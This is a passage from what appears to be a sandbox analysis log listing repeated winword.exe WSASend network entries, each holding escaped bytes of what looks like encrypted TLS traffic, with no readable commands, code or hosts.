475. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc8\\xbf\\x1a\\xdb\\x96ypr6\\xefh\\xb1\\x85\\xfao\\x98d\\xa1`p\\xe8\\xdc'\\xc0\\x00\\xe6\\xad6a\\x95\\xeb,\\xef\\x88\\x90\\xffp\\x96\\xa8\\xd2d\\x07\\xd3\\xa7.\\xc5\\x1e2\\xba\\xaf1\\!5\\xcc\\x12\\xe0\\x11\\xf1\\x88zwu\\x0f\\x83\\xe6\\xddwo=\\xdcb\\xfc\\xa0\\xacc\n\\xb2\\xbf~\\xeb\\xca\\x84\\x8a\\xeb\\x105\\xee_\\x86\\xdeb\"j\\xd7\\xbb\\x8c\rq\\xf3\\x02j\\xcb\\xc2\\x81\\xb2x\\xfe\\x8d;\\xde\\xbd\\xec\\xae\\x97\\x92zql\\x84\\x8f\\xc7\\xa8\\x13\\x93'\\x8b\\xc66c\\xad\\xfd\\xd1y\\xc8\\xc9m\\xc6k\\x05s\\x06\\x1e\\x02a\\xc7ay\\x0c\\x89\\xe5\\x04\\x8e\\xe2\\xda\\x93\\\\xa8\\xc1\\xfff\\x18\\x8f\\x1d\\x9d\\x07\\x14\\xd3~\\xbe\\xbek\\xe6i\\xdc \\xa2h!*`f:\\x11?\\xed48/\\xe7\r\\xb5\\x9f\\xcbo\\x03t\\x8c\\xa36\\x1aa\\xab\\xe3\\x84\\xe6\\xc3%e\\x14\\x89d\\x80\\x10 \\x19f\\xc4\\x9cud\\xb5\t+\\x1f\\x8cq\\x18vyk\\x92\\xf1\\xdc\\x1ai\\xdea\\x88\\x05\\xaaj\\xf6zm\\x85"
476.  
477.  
478. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb9~\\xe8\\x19\\xf9\"\\xd7c\\x9a\\x83\\x8dj\\x84ed\\x12d\\xb5\\xc4e\\xae\\xf4\\x91\\x9e4m\n\\xf0\\xa4\\xa7\\x15e\\xb3\\xcan\\xdd\\x93\\xff,\\xfe\\xde@\\x9b)\\xc3\\x06\\xbe\\xf9\\xa3\\x983r\\xe5\\x1c\\x19a\\xc3\\x91\\xa2\\xb6#\\x9f^kl\\xb9\\xd7\\x93z\\x16\\xd0\\x1d!d\\xa0\\xecx\\xb8\\xbfal\\xa0:\\x19\\x1dt\\xde\\xe7\\x8bi\\x89\\xe9.n\\x8fa\t\\xcfv4\\x14\\x9c\\xdfb\\xb0\\x97ar\\x8d\\xdf\rh,\\xcd\\xb0\\x978jf!|\\xa5b\\xf3\\xff-\\xcfy\\xb6\\xf7\\xf5\\x80\\x8f\\xbb\\xf8'\\x88\\xb5\\xb2\\x9ct\\x93\\xd7\\xed\\x13\\x18\\xb3c\\xf9\\x83\\xd9==\\xb7l\\x9f\\xd1t(\\xff\\xf8.1\\xa8ao\\x92\\xd7\\xaf~\\xda\\x87h\\x19j\\x12\\x92\\xf5\\xc110<ft\\xb0\\xaepg\\x80\\xc7ik\\xbb9b+\\x81n\\xb7\\x99\\x15\\xefmt\\x85\\xe5\\xdf\\x01\\x04\\xbf$\\x9c\\xa1\\xd8\\x05\\x02wh<\\xd7x\\xe9\\x0b\\x0fs\\xbb\\x0b\\xcaf\"fo\\x10\\x96\\x8d\\xbb\\x17\\xd5\\x89\\x9a\\x87\\xeb\\xfe\\x1b\\xe7"
479.  
480.  
481. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xdd\\xfdl\\xd6\\x7f\\xa0\\xd2\\xd1q\\xd6\\x97\\xb9,\\xdd0\\xfe\\x00\\xdd\\x81\\xdau\\xd6\\x0b(o\\x9c\\x1ezk\\xf9\\xa5dn\\xdd\\xc4\\xa2\\xee?\\xa0\\x1bus\\x89\\xa2\\xee@t\\x1ej\\x91:\\xb4\\x9c\\xf0\\xaa\\x0e\\x11\\xac\\xb5\\xc93\r\\x01&\\xffk\\xbdg\\x02\\x8a6\\x82\\x13|$\\xea=z\\x99-\\x03\\x8et\\xc1\\x89\\xd5\\x82\\xb5\\xfe-&cm\\xbe\\xd8\\x02\\x8d1~\\xb9\n\\x87\\xec\\x97\\x9d=\\xc9\\xbd\r\\x85m\\x01m\\xd6o)\\xa2\\x1c/x\\x82\\xb23\\xe0xf\\xdbb\\x17q\\xee\\xab\\x8c\\xdb.\\x0e\\xab\\xaa-\\xadn\\xa6\\xaf\\xde\\x10$\\x83b\\x1fu\\x85@\\x85\\xdb\\xa3#\\xb7\\x9e\\x12r9j\\xf3\\xe61^\\xc4d\\xc0p\\x15\\x8e\\x13\\xc1\\xff*\\x85\\xd1\\x9ejk\\xcb.\\xb1\\x92\\xe5\\x02\\xa4gq^!\\x12m\nz\\xa4\\xf4\\xd4\\xa8\"\\xb8\\xc7\\x84t\\x088\\x0cfm\\x82\\x9b(:h\\xb1tkm\\x94\\xccc\\x12(\\x1c\\x99\\xb3;\\xa1\\xcb\\x88\\x93s?v\\xd5\\x1c\\xaez\\xa5l\\xce\\x0b\t:!/"
482.  
483.  
484. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010ki\\x15\\x10\\xae\\xe6\\xdd\\xbc\\xc1l\\xbd\\xb1\\x99\\x9dqb;\\x9b96b\\xb0\\xcb\\xeci\\x81+'\\x81\\xef\t#\\xfcc\\\\xcc^~~\\xd7\\xbb\\xf8wg\\x7f\\xae\\xab\\xb8\\xc2\\x9c\\xa5~\\xac\\xb6\\xef\t\\x83e(g2ov(\\xe3v\\xcb\\xf6\\xee3\\xbe\\x0b357\\xfdqy\\xe3(t2d\\x01\\xfdu\\xb3\\x14a\\x97\\xf4\\x15\\x97\\xb0\\xe8#\\xe1\\x04 xq\\x8b\\xcb\\xa7\\xfc\\x07\\xdb%!\\xdce\\x1b\\x0e4\\xbdj \\xeap\\xec\\xcc+u\\xa1m\\x97\\xea3\\xc3\\xdf\\xf0\\x15\\x19k\\x8a\\xc9p\\xab\\x1c\\xae/w\\x9bk\\x18\\x9a\\xbd\\x90m\\x95\\xbc\\x8ay\\xfbbp!r\\x08\\xf1\\xff\\xf5\\xa2\\x81p\\xf6\\xe0\\x10\\x92\\x98\\x85\\x7f\\xbf\\xf2\\xabi\\xd2\\xe3pp\\xc6\\x1eg\\x9bi\\x07a\\xdc\\xe3\\x0c\\xf0x~\\xe0\\xcc<\t\\x16\\xc1\\xf4b\\xde\\x8d\\x16\\xa7\\xb1\\x0e\\x0b\\x16\\xc93r\\xb5\\x03\\x94\\xf3cte\\x9f\\xc3z\\xee\\xb5\\x89zi\\x89\\xb3\r\\xff\\xecn\\x87a\\x19\\x1ax\\xc42#\\x92%*\\x0e\\xca\\xabx"
485.  
486.  
487. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010fcv\\xad\\xe0n\\xa1\\xc0\\xdb\\x18\\xcc\\xe1\\xb1,|\\y\\xb6\\xbe\\x1f\\xcf\\xb5\\xcdm\\x87\\xebo\\xd5\\xd6\\xa9?\\x8clh\\xef\\xab\\xa9\\xb4\\xa3wz\\x0c\\xe57\\xe1\\x1a\\x7f\\xfc\\xc8*\\x02\\x88m\\xe5\\xe2\\x15\\xdd\\xc5\\xbdv\\x8cq \\x93\\xe9\\x06\\xb1\\x87\\xd6%\\x8dg\\xe9\\x1af\\xe3o\\xc7\\xc5\\xc2\\x13\\xcax5c\\xbc\\xd1\\xfb\\x1dv\\xefma\\xbequ\\x0e\\xae\\xa8\\x80jm.:\\xc7\\xf5o\\xc4\\x1d\\x02\\x91\\xba\\x82ibavj\\xf4j\\x08\\x1f\\xc3\\xca\\xc4\\x81\\xb2\\/\\xec\\xf6\\x15i<\\xdbdd\\xeb\\xa3\\x14\\x89\\xb0c\\x84$\n\r\\xf1x9#\\xe6\\xcf(k\\xa8j_\\xadpzn\\xec\\xb5\\x83rw\\xa0z\\xd8e\\xd1\\xa2yk\\xf2\"\\x89)\\xfc\\x02\\xb1\\x92\\x92fc;ok0e\\xd7>\\x8e\\x1fm\\xcf\\xf0\\xd1\\x87\\xd5\\xa0\\x1e\\x88m\\xd7,g\\xd5\\xed\\xb7h\\x91\\xa2\\xd8`\\x1da\\xe0\\x12v\\x8e\\x8a\\xeea\\x94\\xa3\\x9d\\xe8\\xf8\\xbe\\xc9\\xf3\\xd9\\x19\\xcd\\x84\\x93\\xf8\\xc5\\xe8\\x15h\\xf5i\\xf6\\xaf\\xf1\\x06"
488.  
489.  
490. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xed\\x8e\\xe7\\xa75\\xcd\\xae\\xd3q\\xc8iu\\xd7\\xcc\\xdb\\xbf\\xe3\\x03\\xbb\\x8e2eh\\xa4j\\x983\\\\xdb$\\xb9\\xe2^\\xcd\\x8b\\xcc\\x86\\x05\\xf7#\\xaco?\t1m\\xe1c0\\xbe\\x85l\\xd7\\xda(\\xdc\\x9a\\xc4\\x98\\xc7\\xeb#\\xd7\\xdb\\x82\nw\\x19\\xdf\n\\xb7\\x8f\\xa9\\xa5n5!mx8n\\x1b\\xd2\\x19\\x9b\\xc2\\x12\\x86c\\xb4\\x11\\xe1\\x83\\xa6c\\xb8\\xf7!p\\x08\\xa0\\x13\\xd0\\xa0\\xb0\\xe7\\x0b\\xc6d_\\xa3\\xc8#uhx\\xdd\\xc5?y\\xf8mz\\xb3\\x143%\\xc7!\\xe3\\xf4\\x03\\xcf\\xb5\\xc4;\\xcag\\xe3\\x08\\x8aa\\xa3\\x14\\xdco-\\xff\\x9c\\x96+\\x97\\x1ffj \\xd8g?y\\xf3-\\xfa\\x98\\x01\\xb4)\\xbb\\xd2\\xf1d\\xc1\\x95\\x88*e\\x80c\\xcc\\xd4\\xe2f\\x7f(\\xf1y\\xc3\r\\xc2%\\x06\\xcf\\xf9\\x83\\x10<\\xa3\\xce\\xf3\\x1d-\\xc9\\x7f6\\xf3\\xe3\\xa9%\\x13\\xa2\\x16k\\x0b\\x9f\\x96\\xcbm8\\x0f\\xb3\\xd1f\\x02y\\xdc.\\xad\\xa0\\xba9\ryi@s\\x19\\x01~-+\\xf8hf\\x8e\\x044\\xc7_"
491.  
492.  
493. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbc\\xf1.\\x18\\x81*\\x07\\xa6\\x10\\x8f+\\x88\\xdb\\x96\\xc0\\xdf\\x04\\x1f\\xf7\\xec\\xb4\\x93:\\x13\\xf6\\x845y\\xa5\\x14\\xc2\\xe1a\\x17\\xa8v\\xf79q\\x96q\\xe0\\x11*\\xca>\\xa7\\xcd\\xe8kfp\\x84\\xf9\\xfb\\x13c\\x19!\\x91\\xd9'r2\\xc9hs\\xca\\xbab\\\\x11n\\x01\\xe0\\xc1\\xa2\\xd6\\xf0\\x9bc#\\xf3\\x02\\x88\\x81\\xa69\\x95\\x13o\\x91x\\x86\\xde\\xbf\\xf3\\xa5\\xddf\\xc0\\x17\\x16\\xd8\\xb7\\xf6\\x04\\xd2\\x1b\\x89=r\\xb8\\x1ak\\x83\\x99s\\xbb\\xd6e_\\x92\\x83v\\x1fi\\x9a\\x93\\xc0l\\xb8+p\\x14f\\x06\\x88l2\\xb1n1\\xb6/\\x85\\xbdn\\x1cx\\xbf\\x87\\xd6rzw\\xa6e\\xfbenpu\\x1e\\x1e\\x7f:\\xd5\\xa5\\xcf<\\x82n\\xb0-\\xe0k\\x01\\x02d\\x11\\x1e\\xfc\\xf2\\x81\\xec\\xdb6x\\xba,<\\x91\\x92i\\xb3@\\xbaw\\x06\\x9d\\xdd+\\x8c\\x91\\x9d,g\\xe9phl\\54\\x04\\x19\\x8b\\xbe\\xb0:\\xd6\\xa8\\x7f\\xaa\\x8cc\\xf0\\x84\\xa9)\\x02jp\\xbb\\x8e\\x04`\\xd9 \\xbc\\x18\to\\xda\\x0f\\xc6\\xf6\\xbb\\xa0"
494.  
495.  
496. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd9\\xae\\x04\\xc2de\\xee\\xbf0)\\x9d*@h\\xf4\\x02\\xf4\\xc0s\\x86\\xf2\\xc5\\xd0\\x0f/ku\\xc7\\x1f\\xf6\r\\xbfv\\xe4\\x94\\xa5\\x94=\\x06\\x04e\\xacs~\\xf4\\x1bq\\x04f\\x1dt\\xae\\x14\\xbd\\xe4\\x7f\\x7fy+\\xe1\\xea\\x07~|h^\\xdd\\x1e1*v\\x92|\\x9fr\\xdaq7\\xe2v\\xb9t\\xf7\\x96\\x12dj\\xc5\\x1d\t;s\\x96\\xf0\\xb0&\\x18\\x1a\\xeb\n\\x9f_,s\\x1f\\xf2w\\xd0\\x99v$\\xca\\xa9\tir\\x15\\xef\\xa9kgb\\xb9\\xc94\\xced\\x1bkc\\xf9kd\\xae \\xa1\\xb9\\xcd \\xf9\\xc5x\\xe2s+hs\\xd3\\xc0\\xea\\xbf\\xf5y\\x05\\x99\\x1d\r\\xdc\\xdf~\\x1b~i-\\x7f\\x06.\\xcb\\xb0\\xf5\\x82b2\\xad\\xde\\xc7nu\\x1c\\x1f\\xec\\xca\\xf7\\x05\\x88\\xb7\\x07k\\xc1\\x88\\xd6n9\\x1b\\xe9\\x86c+=\\xbf\\x19s8\\xc8\\x90\\xab\\xec\\xdf\\xcap\\xa9\\x7f\\x99\\xdb:\\x96\\x031\\x19\\xedda\\xe2 \\xbe\r\\xf6\t\\xaclg\\xcd\\xdfd\\xa2m\\x1c\\xaf\\x91\\xbb\\x11ep\\x10\\x1f\\x0f\\x170f"
497.  
498.  
499. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x88\\xd5e\\x0e\\x0f\\x1bv\\xae\\xa9\\xf0\\x00\\x84e\\xac\\x93\\xa31\\xbd\\x8a8o\\xab`t\\xe0\\xef\\x92f\\xe5i\\xf7\\xf5r,i:~\tf\\xed\\xaf\\xb3es_\\x82\\x1a\\x12\\xa8\\x07\\xa3fv<\\x13\\xa4\\xae\\xea\n\\x08z\\x11%\\xc0'\\x16\\xe2\\xea\th\\xc8\\xe2\\x89\\x0f\\xda\\xdb\\xff?\\x0e\\xdf\\xd4d\\x07\\x97r\\x0c\\x11\\x99\\xf6\\xb6\\x0f\\xa1\\x88\\x02\\x03o\\xaa`\\xcf\\x1c\\xc1;j\\x97\\x02d\\xc5\\x187\\x10m)<\\x98\\xd5x\\-x\\xeb\\x9d\\xae\\xfc\\x93\\xb5\\x00*\\xa3\\xa1\\xf4\\xe3\\x84\\x96\\xb9\\xfdev\\x89_\\x18\\x8a\\xaa\\x92\\x82\\xa2k\\x7f\\xfff\\xc1\\xea\\x85p\\x9b\\x1a\\xd7/\\xef|ci o\\xf1ec\\x10u_\\xfes\\xb2\n\\xddg\\xb6\\x99$\\xe4\\xa3a\\xb0~\\x97-\\x1ac\\xfe\\xa4\\xe4w\\xa4\\x1c\\xd0\\xf8z\\xe0%\\x0c\\x8d\\xba\\x8b\\x02\\x95\\xc5\\xa7u\\x19\\x19/\\xd5f\\xec-\\xd3wyz\\xfb`0\\xb1\\x99\\x82\\xe2\\x94;\\x95\\xb6\\xeb\\xf9\\x97a\\xdfb\\xe1^\\xd2_\\x13go\\x87\\xa5\\xe1:"
500.  
501.  
502. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd2\\x00b2\\xd9\\xda\\x0b\\xcdd\\x1c\\x1a\\xfd\\x9e3\\x14\\xd9l\\xff\\xa9d\\xe1\\xeb!\\xc1\\x9d\\xc1b\\xd8\\x18\\xf7n\\x7f\\x06_#\\xcf\\xb1\\xc0\tv\\xa6\\x80\\x009\\xc8\\x04\\x0f,iup\\x1b\\x19!\\x04\\xf8\\xa1\\x8f=h\\xb3^\\xbb\\x91\\x15\\xdb\\xeal\\x86\\x8d~\\xf6&\\x19\\x97\\xdcr \\xae\\xd34e-\rv\\xf0q\\x84\\xed\\xfc\\\\xc4\\xb8j\\x83>\\xcf\\x19y\\x8e\\x18h\\xc5\\xee\\x00\\x10.\\x9a\\xac\\xd8z2\\x9a\\x863z\\xec\t\\x00\\xfb\\xd2\\xd5\\xf9\\xcd\\xe2\\xe7\\xf0\\xeei`g\\x00`\\x17s_b\\x89\\x14\\xabmo\\x8f\\xf5\\x84\\xce\\xf4\\x18xu\\xdd\\xe2d\\x9f\\xc0=\\x96\\x0e\\xc2\\xcb\\xec\\x02h>\\x10\\xa6\\xbeey\\xa4v\\xad\\xe0h9\\x92n\\xdd0\\xae\\x1ep\\x85@\\x92\\x82$\\x8aj\\x94\\xc3;\\xdbd\\xa4<\\xde\\xfb\\xd3!\\x1d\\xad\\x07$\\x1ef\\xfa\\xa8\\xf8i^:\\xdf\\xd8z\\xfb;\\x19i\\x9dto\\xa1\\x1b1\\xa7-\\x0c;\\xdfs\\x9a\\xa3\\x98kca\\xfe^\\x18n\\x1b\\xb6pw*\\xccc"
503.  
504.  
505. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xeb\\x95\\xe2\\x0ev\\xab\\xf5if\\xb2\\xcetj~\\x07\\x88\\xbd\\x18\\xd8;a`\\x13'o\\x1ea\\x1f\\xbc\\xe0\\xb6\\xf5\\xdel\\xe3\\xcf\\xe2\\xd4fu\\xab\\x8am\\xf7\\xbb\\xb82m\\xfb\\x86\\xff\\xda\\xb4\\xb0\\xd4)\\xee\\x17g\\xfd\\xd6c@u\\xfc\\x193n\r\\x87\\xadz\\x17\\xf7\\xa8l\\xc5\\xbd\\xc8\\x83\\x87x\\x19\\x85+-\\xd5sq(\\xc4\\x107hgm6\\x14\\xfa4b\\xc5v\\xf9\\x03\\x1b\\xa5\\x1d\\xfc\\xd6\\xaa\\xa11\\xa4yb%\\xc0i\\xe4\\xc8\\xdcp,\\x06\\xe1\\xa2\\xb9#\\xbb.\\xb0\r\\xbb\\xb8\\xda\\xb9\\x8bd\\x8c6ij\\x13\\xaa\\x91\\x96\\xa6\\x9d\\xf1\\xa7\\xcf\\xe2\\x0c\\xb7x\\xf0\\xb0\\x92\\x7f\\xd8\\xfc\\x9f3\\x0e~|\\xd3\\xdb:@j\\xbe_0 \\xf8\\xef\\xe6\\x9c\r\\x06r\"\\xddrb\\x82\\xfd\\xb8\\xb0\\x84n xt\\x07 5\\xc5\\xbb\\x0f\\xcd\\x95\\x01\\x1a\\x00\\xd2'\\xa7\\xb9\\xf8\\xb8h\\xa9q:<2\\xde\\x1e&qp\\xab\\xb5>n\\\\xed\\xa7\\xb6\\xfa\\x86\\xfe.q\\x19\\x0b\\x8f\\x1eg\\xa5\\x14\\xad\\x81\\x9e"
506.  
507.  
508. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010=\t\\xb7d\\xad\\x11\\xb2\\x8f\\x08\\xa9\\xc9\\xcbi\\xc2\\xf5\\xd3\\x07\\x92d\\xcfm\\xd8u-*;\\xbc\\xfc)z\\x90\\xb4g\\xee\\x83\\x8d\\x1e\\x96#k\\x01hz\\xc7n5\\xc5,d=-f:\\x84\\x94\\x8a2\\xca\\x9f\\x9d\\xf96g\\xe9e\\xb9n \\xff\\xb0\\xf1wvq\\x8a\\x88\\x16\\xfb\\xdc\\xb0\\x1f\\xf6\\xe2\\xa4\\xe0\\d\\xa3.\\xe6g\\xe4\\xfc\\x9cj\\xcd\\x88*\\xa8\\xd0y\\x8b\\xdcx\\xae\\x90 \\xf4\\xe5\\xc1\\xe8\\xe6\\xcf\\xf1lcox\\xeb\\x05 k\\xfc\\xd8pkf\\xc4\\xbc\\x173\\xb6\\xb3%\\xa3p\\x00x\\xd1\\x05\\x04s\\xee7\\xbb3\\x9d\\x1d\\xb9\\x8d\\xf8p~&\\xea(\\xc8_\\xae\\xc6\\xb1\\xbc4c\\x9dzh>\\xd6\\xabd\\xa9\\xa9\\xcd\\xc5\\xe8i\\xa5j\\xe8\\x92\\x02\n%.\\xc4\\x922j;\\xc1\\x12\t$)ya\\xb8\\xd3dr#\\xe0)\\x9bo>$\\xc4\\xfc:\\xf6\\xcdi\\xd5\\xe7\\x11\\xb9\\xe1f\\x94\\xc9\\x07\\x8b\\x8a\\xac$~\\xb0b\\xcb\\x9e\\x0bo9\\x07\\xbdy\\x1f\\xb9\\x80;\\xcd\\x04\\xa2\\xe5\\xe1\\xf8"
509.  
510.  
511. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa0\\xea\\xd7,;\\x14\\xf0;?\\xd4\\xc5\\xae\\xa7\\xfb\\xa2\\xad\\xb3\\xbd\\x12r\\xc4\\xec\\xdb\\x98?1\\xae\\xb0\\x17j\\xa6@\\xff\\xb5\\xcd1\\x96\\x87\\x8e\\xae=\\x8a\\xde\\xf6\\xe0\\xc2\\xa6\\xf3\\xea\\xe4\\x04n\\xa4\\x8e\\xf3\\x03lgl\\x80\\xc6\\xdcy^\\x93\\xa7%h\\xd3\\xad\\xa3\\x80s\\xafie5\\x12t\\x81l\\x053\\x03f\\xac\\x8a\\xdd,\\x96\\x06\\x00\r\\xa3\\xcc\\x04\\xca\\xc9f \\x9e;o\\x98#?\\x07e\\xb50\\xf3\\xfcdi\\x02\\x9d\\xf2r~\\x9bi\\xeb\\xe6rm\\x89\\xffq4insu\\xf68\"'8\\xdej\r\\xbc\\xf8\\xce\\xfa\\x81\\xd8\\xce\\x0f\\xa6\\xa8\\x96@\\xe7qsst\\xa7\\x1c\\\\x0e5\\xae\\xf5ea\\x8c\\xd5pci&\\x8a>i\\xfc\\x9b\\x94ip\\xcdm\\x18\\x98e8\\xedi\\xcc\\x16\\x08c\\x90\\x9a\\x81\\xa4\\xed\\x1a\\x1c\\x9c\\xf0b\\x94\\x17\\x02\\xe8\\xf4\\xd0\\xa1\\xf4\\x94|\\xe3\\x8f`\\xac\\xa6\\x98\\xc2\\xf6\\xf5-7.\\xcd\\xb7\\xf9 \\xfe5_-33\\x1a\\x945\\xb2\\xf5\\x84zp\\x05\\x18\\x10yu"
512.  
513.  
514. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd3h|d\\x8d\\xf9\\x00i\\xb6:xe.\\xb3\\xa6`\\x80\\x1b\\xc6\\x981_\\xca\\x17\\x8d\\xf1\\x9f\\x9e\\x951\n\\xbdp\\x97\\xf5\\xc0\\xbc\\xd6\\x19z+\\xa3\t\\x10\\xa8<\\xee\\xa6\\xef\\xd0\\x0ck\\xb0k\\x04\\xbd\\x0e\\x1f\\x98vey\\xb7\\xcb\\x1bv\\xdd\"\\xeb\\xa9\\x99\\x13\\xd5\\x8a15a$b\\xba\\xff?\\xf7j\\x0e\\xc9\\xcb\\x02\\xaet44w\\x06\\x8bf\\x1e\\xea\\x8c\\xbdim\\x08\\xdei\\xa4r\\xe1\\xfa\\x97~\\xb5\\x11\\xef$\\xee\\xfb\\xf6\n\\xa3\n\\xbb\\x87a\\xa6\\xb8\\x93\\xc5\\x8e\\xae\\xc8\\x01\\xa1\\x18l_\\xf1\\xd9\\x0e\\x82-l\\xac\\xee\\xe8\\x17#=\\xa7\\xcb\\xad\\xba#\\xc3i\\xa3\\xe8\\xc0\\x05\\xaf\\xab&\\xcd\\xdb\\x95\\xac\\x86g\\x8c\\x10\\xb4\\x853\\xb4\\xe0;\\xa8\\xe4\"\\x97i\\xfa\\x0c\\x84\\xbc\\xeb0\\xfe\\x0f\\xa7\\xbf\\xd3\\xdd\\xd8\\xfb\\x94\\x1b\\x83\\xfee\\x80\\x12k\\x9b\\xa1\\xa7x\\x9b\\xd2\\x0f\"\\x91\\xc15\\xf3\\x9b$w)\\xd7\\xb6\\xcd\\xcd\\x18\\x0c<\\x0b\\xa1\\xb6\\xeb\\x0b\\x93\\x84u\\xab\\xc04\\x9a\\x03\\xcf\\xd7\\x14\\xe0.\\xb6^\\x06+\\xdf"
515.  
516.  
517. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010w\\xc1lro\\xa8s\\xe6a\\x0ft\\xf3\\x963\\xc9^\\x0b\\xb7(7\\x94f6\\x8f\\x9e\\x97\\xc8\\xa8\\xb7\\x95n6\\xbax\\xdb\\x9e\\xe7\\xech<t\\x07i\\xd1\\xa5\\xa2\\x92\\x03\\xf7\\xd0l\\xaa\\x858\\xfc\\xf2\\x81\\xdfr\\xc9\\xcc\\x08\\x9cp/\\x87\\xe5\\xe2ve7w\\x14h\\xe9\\x11c.\\xea!\\xe7\\x83kw|,\\xb0%\\x0fn\\xb5\\x9f(\\x03\\xb6\\xf7\\x8c\\x1e\\x8d\\x1c\t\\x83j\\xfay\\xfb\\xa8\\x04akc\\xc9\\xab\\x8d\\xe4\\xb5\\x08d\n\\xd1ab\\x8b\\xb683\\xf1\\xbd\\x15d\\xbd\\xa1>\\x19g\\x98\\x7f%\\x84\\x01\\x9c\\xbc<\\xef\\xb1s\\xad,\\x98b\\xc0\\xd5\\x12\\x91\\xa5$\\x99\\x19l\\xee\\x9d\\x1a\\x18\\x0b\\xe4\\xde\\x1d\r\\x1a\\xa5\\x8cr\\xcd\\xee\\xf8\\xd7\\xc8\\x96\\xba\\x1a\\x1f\\xbax\\xbfo\\xb10;\\x17'\\x8d\\xa8\\x11t\\xab\\xef5\\xe80\\x17\\xce\\x85\\xba\\x0c+\\x1d/\\xb9ms\\x82*>\\xa3\\x14\\x14\"v\\xf3#|6y\\xf7\\xb4e\\xe9\\x13\\x0b\\xfd\\xc9\\x00\\x06\\xb0/\\xb7\\xf9\\x16\\x87\\x96=\\xb2\\xcd\\xb5\\x03\\x04\\x9f\\xa5\\x1e"
518.  
519.  
520. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc9\\xb8b\\xa7\\xd1\\xaa\\xf7\\xd9\\~\\xd9\\x91\\x82.\\x00u\\x04.\\>\\xa8\\xc1)?\\xee\\x06\\xd9\\xd0\\xdeh\\xd2\\x067%bb\\x10.\\x18\\xf1p\\x7f\\x9cwc\\xfb\\x8d\\xce\\xf4g\\x19\\xe6~\\xfd\n\\xa4\\xb4`\\xfate\\x0e7\\x82\\xd7\\x9a\\xed\\xbc\\xcd\\x88+\\x11\\xd8\\xab\\xbb\\xec<7\\xa6\\x0b+g\\xff\\x11\\x01\\xde\\x1b\\xb6\\x99\\x9b\\xf4\\xaa\\x18rc,q\\x9a\\xa9dq\n\\x87\\xf3\\x0b\\xed\\xe0\\xf8m<\\xb8\\xe2\\xdf\\xad\\xc4\\xd0\\xcfi\\xa8\\xaf\\xa3(\\xc6\\x87\\x1d\\xe9\\x9b\\xdd\\xba\\xc8\\xb6<\\x92\\xeb\\x89\\x81\\x186\\xbb%t`\\x06\\xd5\\xbe9%\\xfb\\xa6\\xa2\\xf6r4\\xdde\\x95\\xaddl\\xf5\\xe1;xg\\xdd\\xf4\\xae\\x07\\xb7\n\\x9d(\\xfext\\xda\\x02m\\xdd/\\xfb\\x00b\\xd3\\xado\\x158\\xf4\\x13\\x11v\\x95\\x9di\\xc2+\\x10\\xab\\xff\\xcd\\xda\\x9dm\\x9a\\xb7\\xf6\\x98\\xbf\\x90o\\xc5\\xb2\nt\\xc3\\x04\\x11\\x7f!\\x9b\\x18pg\\xd6\\xbc\\x83\\xff\\xf7\\xaa\\x17\\xfdh\\xc8xn&\\x0b\\x93\\xf9/\\x83l\\xcc\\xf3"
521.  
522.  
523. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010kj\\x93l'_\\xa6\\x02)\\xee\\xa3%\\x14\\xea\\xbf\\xe6v\\x87d\re\\xb2\\xbah\\x8fv<\\xf0\\xeb\\xa1\n\\x84\\xf3\\xfc\\x1cb\\xb6\\x97\\x98\\xca\\xfb\\x9c\\x9cg\\xc9b\\xd6gk)xskfq \\xabx\\x91$$\\xf3\\xad\\xf4\\x91\\xd6`\\xdf\\x96\\xc9\\xd2\\xb004\\x7fl\\xda\\xb5\\x94\\xcd\\xb4@f\\xeb\\x0c\\xc4\\x88@-\\x06\\x16s\\xc8\\x13\\xa5\\x00\\xfe\\xe0\\x02\\xf1\\xc3\\x83yi\\xd4\\x9a\\xf1\\xca\\xb1\\x8b\\xa9\\x13\\x93\\x94\\xa5@\\x83\\x05\\x80\\x98?\\x04\\xda\\xe9\\xdav\\xb9t\\xc1\\x80h\\xdf\\xe6\\x00\\xea\\x89.\\xd1\\x14\\x98-%\\xf2\\xf5h\\xb51)\\x83\\xab\\xfa\\xeb\\xaf\\x1f*xj\\xf7\\x1e\\xb1\\x8d\\x11\\x9d-\\xca!\\xb8\\\\xbe\\x1dc\\xd9\\x8c\\xec4\\xd3t\\x1c\\x9eu\\xbe&b\\x9f\\x97\\xa2\\xf3\\x14\\xd0\\x98s%p\\xb1\\xaa\\xdf\\xc0l\\x80\\xf5\\xf4?\\xb2w-\\x06\\xcc*\\xfe\\xd4\\x8cq\\xc7\\x96\\x0f\\x89a\\x06\\xa3\\xa3\\x88\\xae\\xd1\\x1a'\\xd2j\\xc5\\xfb\\xbfi\\xa0\\x82\\xcep\\xc9\\x9e\\x93\\xea\n\\x9e:\\x1e\\x98n"
524.  
525.  
